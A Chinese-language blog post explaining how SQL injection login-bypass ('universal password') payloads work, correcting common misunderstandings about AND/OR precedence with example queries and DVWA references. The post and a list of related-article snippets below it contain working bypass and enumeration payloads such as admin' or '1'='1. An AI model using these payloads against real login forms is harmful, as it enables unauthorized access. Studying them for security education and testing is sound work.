那些年我们所误解的万能密码

最新推荐文章于 2023-03-14 11:03:59 发布
最新推荐文章于 2023-03-14 11:03:59 发布
阅读量1.1k 收藏 6
点赞数 3
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41725312/article/details/88559257
版权

前言

在sql注入中万能密码是最很典型,也是基础的存在,但新手很容易忽视它,以为真正懂了,但却没有。我就是这样,最近重新看它,发现我根本就没真正掌握,甚至网上很多关于万能密码的分析是错的

分析

sql语句中and的优先级比or的高

假设sql语句是这样

SELECT * FROM users WHERE username='$uname' and password=$passwd'

正常输入一个用户名为admin密码为admin的账户,如下

SELECT * FROM users WHERE username='admin' and password='admin'

返回一条数据
mark

网上的常见的万能语句是这样的

  • 用户名为admin密码为' or '1'='1
SELECT * FROM users WHERE username='admin' and password='' or '1'='1'

这个语句确实返回的为True,但是他返回的是所有的数据
mark

你所登录的用户就是查询出来的第一个
而在这个数据库中则是Dumb,而不是想要的admin

mark

因为and的优先级比or的高
所以数据库是这样比较的

username='admin' and password=''  #先判断这个and语句,结果为假
or '1'='1' #再与这个语句比较

'1'='1'相当于任意的数据,而假 or 任意值,最终返回所有的数据
如果你只改username,无论输入任意值都不会影响这个结果

  • 用户名为' or ''=''密码为' or ''='
SELECT * FROM users WHERE username='' or ''='' and password='' or ''=''

原来在i春秋上看的一个视频就是以这个讲的
这个和上面的原理是一样的,你用户名为空都可以,根本没必要搞得那么麻烦

mark

这些语句你会发现在dvwa的sql注入关卡不能用
dvwa的代码中有一个if判断,返回是否是一条数据,所有这些返回全部数据的就不奏效(密码进行了加密也是原因)
我也是因此发现端倪的

正确姿势

  • 用户名为admin' or '1'='1,密码为空即可
SELECT * FROM users WHERE username='admin' or '1'='1' and password=''

username='admin' 
or 
'1'='1' and password='' #and得到假

先进行and,得到就是username='admin' or 假,然后只会返回username值为admin的数据

mark
mark

可以看到无论是 '1'='1'还是'1'='2'都不影响结果,因为and后面的password已经为不成立了

  • 用户名为admin'/*',密码为*/#即可

利用注释符

SELECT * FROM users WHERE username='admin'/*' and password='*/#'

总结

要踏踏实实的学好每一个知识点

酉酉囧
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入万能密码 admin 'or '1'='1'# (# 为注释后面内容)
wjwqp的专栏
03-01 1万+
admin 'or '1'='1'# (# 为注释后面内容) admin'-- admin'or4=4-- admin'or'1'='1'-- admin888 "or"a"="a admin'or2=2# a'having1=1# a'having1=1-- admin'or'2'='2 ')or('a'='a or4=4-- c a'or'4=4-- "or...
DVWA--Brute Force
weixin_42191656的博客
08-15 237
DVWA平台Brute Force全级别通关
表单绕过实验万能密码
aliu555的博客
03-14 505
那么我们在看这条语句,就相当于只需要满足use的值为空,或者是1=1和pwd等于’123‘。我们理解这条是查询数据库中表名为tb_admin中的use列,并且查询需要满足的条件是use列中值为“11”而且还要pwd列值为“123”的数据信息。万能密码的用户名和密码: admin or 1=1 或者1 or 1=1 or 1=1这个的原理就是利用了数据库在查询过程中的代码漏洞造成的。通常我们会使用这种方法来验证网页上用户输入的账号和密码,如果是有这条信息的则出现另一个登录成功。这是一个普通的查询语句。
sqli-labs 11-16
weixin_45442394的博客
09-14 290
一、环境配置 二、访问192.168.182.167:8001 Less-11 输入admin’,出现语法错误,存在字符型注入 admin’ or ‘1’=’1,登录成功 admin’ order by 2#,页面回显,有两列 -admin’ union select 1,2 #,判断显示位 -admin’ union select 1,database() #,判断数据库名称 查数据库“security”的表: -admin’ union select 1,group_concat(ta
SQL手工注入语句
admin的博客
10-27 412
万能密码 or'='or' admin' or '1'=1' admin'# 1' or 1=1 --+ 显错注入admin' '1'='1 思路:看有没有注入,判断多少列,判断数据库类型,找库,找表,找列,联合查询 #可以在输入框输入,不能在url输入,用%23代替 --+可以在url输入,但不能在输入框输入 判断数据库类型 and exists (select * from msysobjects)>0 access数据库 and exists
SQL万能密码:' or 1='1
热门推荐
friendan的专栏
08-15 6万+
select name,pass from tbAdmin where name='admin' and pass='123456' 输入用户名:' or 1='1 SQL变成下面这个样子: select name,pass from tbAdmin where name='' or 1='1' and pass='123456' 1='1' 永远为真,所以
万能密码:‘or 1=1-- 实战SQL注入,秒破后台
杨明金的博客
10-24 3万+
主要是没有对登录密码的字符串进行参数化和过滤,所以导致网站可以直接用“万能密码”进行突破登录 仅供学习交流 这是某同学做的网站,今天无聊打开了,并帮他进行测试一下 看到这个后台,感觉做的还是不错的,首先SQL注入一般这种“万能密码”在99%的网站都是没有用的了,因为几乎所有发布到网络上的网站都是有进行安全考虑的,像这种学生的学术作品的话,一般不会考虑那么多,所以直接使用万能密码进行登录后台 万能密码:'or 1=1-- 用户名随便输入,密码填写这个,输入验证码,ok,大功告成 直接就.
软件测试应该注意的几大误解
03-23
软件测试应该注意的几大误解软件测试最近看了网络上所谓专家写的文章,发现了一些对TDD与QA部门的误解。本文将解释部分误区,并集中讨论QA团队要在敏捷的世界里获得成功所必须解决的一些问题。对测试的误解1."你只...
WiFi的十大常见误解.doc
10-26
然而,关于WiFi的工作原理和技术细节,许多误解仍然普遍存在。以下是对这些误解的详细解释: 1. **共享媒介**:WiFi接入点(AP)确实会在单一通道上运行,允许多个客户端共享同一频道进行通信。但是,由于无线信号...
UML八大误解
03-01
我从2002开始专门从事研究和推广UML的工作,在为软件组织提供UML相关需求和设计技能服务时,经常会发现软件开发人员对UML建模存在种种误解。本文归纳了最典型的八个误解加以剖析。UML模型是开发团队内部高效沟通的...
视觉设计常见误解
03-03
最近,我有机会研究对视觉设计作用的常见误解,这些误解仍然盛行于行政主管、产品主管,工程经理和市场专家中。设计团队成员如何说明这些认识是错误的?又该如何向同事和老板展示视觉设计真相?视觉设计师在特定产品...
记一道CTF 中遇到的SQL注入新型万能密码问题
大方子
10-09 8130
0x00. 引言 我们平时遇到的SQL注入万能密码都是形如admin' or '1'='1, 这种使用or 关键字使得查询结果永真,或者形如:' UNION Select 1,1,1 FROM admin Where ''=',这种使用union使得查询结果永真, 但是有一次我在CTF的比赛中遇到的SQL注入问题,使用这两种万能密码都不好使,不管怎么变换形式,都不好使,显然是or和union ...
DVWA全级别详细通关教程
m0_62063669的博客
07-05 1万+
dvwa全级别详细通关教程,暴力破解,命令注入,CSRF跨站请求伪造,文件包含,文件上传​,SQL注入,XSS
万能密码原理和总结
不急不躁
07-04 2万+
我们所常说的’or’=’or’万能密码的原理是这样的: SQL语句sql=”select * from user where username=’”&username&”‘and pass=’”& pass&’” ,当我们用户名和密码都填写’or’=’or’提交的时候,即此时语句中的username和pass都等于’or’=’or’,那么,这条SQL语句就变成了:sql=”select * fro
万能密码漏洞
Coisini的博客
06-15 1万+
本来都不打算讲这个漏洞的(感觉太low了),但是在最近的一次渗透测试中,居然发现了这个漏洞,而且还是政府的网站……所以还是打算讲一下吧 最近在一次爬网站地址时,发现了这个登录界面,随手输入了一个万能密码,没想到居然进去了 漏洞原理: 网站把密码放到数据库中,在登陆验证中一般都用以下sql查询语句去查找数据库 sql=select * from user where username=’use...
万能密码
freshfox的博客
05-30 2752
试一下'or''='吧,在提交用户名处输入 jmdcw'or''=',这样的SQL语句就是select username,userpass from user where username='jmdcw'or''='' and userpass='12345678' 在逻辑表达式中,AND的优先级要高于OR,所以语句会先对 “''='' and userpass='12345678'” ...
1203GMT-VB一种N-Channel沟道DFN8(5X6)封装MOS管
最新发布
07-20
1203GMT-VB;Package:DFN8(5X6);Configuration:Single-N-Channel;VDS:30V;VGS:20(±V);Vth:1.7V;RDS(ON)=9mΩ@VGS=4.5V;RDS(ON)=7mΩ@VGS=10V;ID:80A;Technology:Trench;
一小时速览:密码学基础与常见误解
"一小时了解密码学-自译"是一份由Colin Percival在20105月13日创作的讲座,旨在纠正人们对密码学的常见误解,并提供实用指导。这份PPT主要针对的是初学者,帮助他们快速掌握密码学的基本概念和在实际应用中的注意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值